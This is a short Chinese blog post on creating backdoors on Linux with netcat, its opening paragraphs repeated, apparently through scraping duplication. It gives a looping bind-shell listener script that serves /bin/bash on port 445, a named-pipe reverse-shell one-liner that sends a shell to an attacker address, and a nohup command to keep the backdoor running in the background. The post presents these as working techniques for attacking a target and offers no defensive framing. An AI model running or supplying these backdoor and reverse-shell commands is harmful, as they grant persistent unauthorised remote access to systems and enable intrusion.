Linux下后门初探(一)
2016-05-27 22:30
387 查看
在Linux下创建后门方式一
默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。
listener.sh 监听脚本
在Linux的大部分发行版中都默认编译了nc,
但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项
(没有define一个GAPING_SECURITY_HOLE常量),
也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就没办法利用了呢?天无绝人之路,来看下面的TIP。
在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
创建持续性的Netcat后门
保持程序后台运行的正确方法
eg:
默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。
listener.sh 监听脚本
#!/bin/bash while [ 1 ]; do echo -n | netcat -l -v -p 445 -e /bin/bash done
在Linux的大部分发行版中都默认编译了nc,
但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项
(没有define一个GAPING_SECURITY_HOLE常量),
也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就没办法利用了呢?天无绝人之路,来看下面的TIP。
在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:
root@bt:~#mknod /tmp/backpipe p root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
创建持续性的Netcat后门
保持程序后台运行的正确方法
nohup 命令 &
eg:
后台执行监听脚本: nohup ./listener.sh &
相关文章推荐
- Linux内核编程三:uboot移植
- arm linux 编译问题
- Linux内核编程二:内核模块
- Linux内核编程一:编译内核
- linux C —— gdb调试、简单Makefile
- lsnrctl start - Linux Error 29 Illegal seek
- linux 多线程学习
- linux C select函数学习
- Linux 虚拟文件系统(VFS)介绍
- 一站式linux0.11内核head.s代码段图表详解
- linux基本命令(40)——wc命令
- Linux屏幕录像
- linux基本命令(39)——grep命令
- Vim 高级用法 1 点的妙用
- linux
- linux下的简单文件读写锁的操作
- linux
- CentOS 6.5 下vim 配置
- centos7之lamp环境搭建
- CentOS6.5安装JDK